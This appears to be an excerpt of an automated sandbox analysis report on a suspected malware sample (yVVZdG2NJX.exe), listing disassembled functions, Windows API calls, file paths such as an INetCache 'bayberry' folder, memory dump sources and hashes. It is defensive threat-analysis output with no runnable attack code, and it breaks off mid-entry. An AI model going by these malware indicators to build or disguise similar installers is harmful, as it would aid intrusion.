                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$Call
                                                                      • API String ID: 2624150263-2651886527
                                                                      • Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                      • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                                                      • Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                      • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
                                                                      Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne, xrefs: 004021C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInstance
                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne
                                                                      • API String ID: 542301482-920775469
                                                                      • Opcode ID: 6726bf14e95c28a8eef9ad412ca65ffc9ea6cc976661a48ac6a4b746f0d58001
                                                                      • Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
                                                                      • Opcode Fuzzy Hash: 6726bf14e95c28a8eef9ad412ca65ffc9ea6cc976661a48ac6a4b746f0d58001
                                                                      • Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                      Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: 512375b0d91e1f35eaafe1d2d9ea6627de5ab3dbf7b488781e982afef0b9970b
                                                                      • Instruction ID: f65ff15fdb1f10fb5373ba158cef8787300933468326e23b7288bb8c2237705b
                                                                      • Opcode Fuzzy Hash: 512375b0d91e1f35eaafe1d2d9ea6627de5ab3dbf7b488781e982afef0b9970b
                                                                      • Instruction Fuzzy Hash: 87F0E271A10000ABCB00EFA0D9099ADB378EF04314F20417BF401F21D0DBB85D409B2A
                                                                      Function 004043CD Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040446B
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040447F
                                                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040449C
                                                                      • GetSysColor.USER32(?), ref: 004044AD
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
                                                                      • lstrlenW.KERNEL32(?), ref: 004044CE
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404549
                                                                      • SendMessageW.USER32(00000000), ref: 00404550
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040457B
                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
                                                                      • SetCursor.USER32(00000000), ref: 004045CF
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
                                                                      • SetCursor.USER32(00000000), ref: 004045EB
                                                                      • SendMessageW.USER32(00000111,?,00000000), ref: 0040461A
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                      • String ID: Call$DC@$N
                                                                      • API String ID: 3103080414-3199507676
                                                                      • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                      • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                                                      • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                      • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F
                                                                      • API String ID: 941294808-1304234792
                                                                      • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                      • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                      • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                      • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                      Function 00405EE3 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                                                      • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                        • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                        • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                      • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                      • wsprintfA.USER32 ref: 00405F62
                                                                      • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
                                                                      • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052
                                                                        • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\yVVZdG2NJX.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                        • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                      • String ID: %ls=%ls$[Rename]
                                                                      • API String ID: 2171350718-461813615
                                                                      • Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                      • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                                                      • Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                      • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                                                      Function 0040652B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00403347,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00403347,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00403347,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\user\Desktop\yVVZdG2NJX.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-3316843490
                                                                      • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                      • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                      • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                      • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                                                      Function 00404275 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                                                      • GetSysColor.USER32(00000000), ref: 004042D0
                                                                      • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                                                      • SetBkMode.GDI32(?,?), ref: 004042E8
                                                                      • GetSysColor.USER32(?), ref: 004042FB
                                                                      • SetBkColor.GDI32(?,?), ref: 0040430B
                                                                      • DeleteObject.GDI32(?), ref: 00404325
                                                                      • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                      • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
                                                                      • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                      • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
                                                                      Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                        • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,?,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                      • String ID: 9
                                                                      • API String ID: 163830602-2366072709
                                                                      • Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                      • Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
                                                                      • Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                      • Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
                                                                      Function 703D2398 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D24DA
                                                                        • Part of subcall function 703D122C: lstrcpynW.KERNEL32(00000000,?,703D12DF,00000019,703D11BE,-000000A0), ref: 703D123C
                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 703D2460
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 703D247B
                                                                      Strings
                                                                      Memory Dump Source
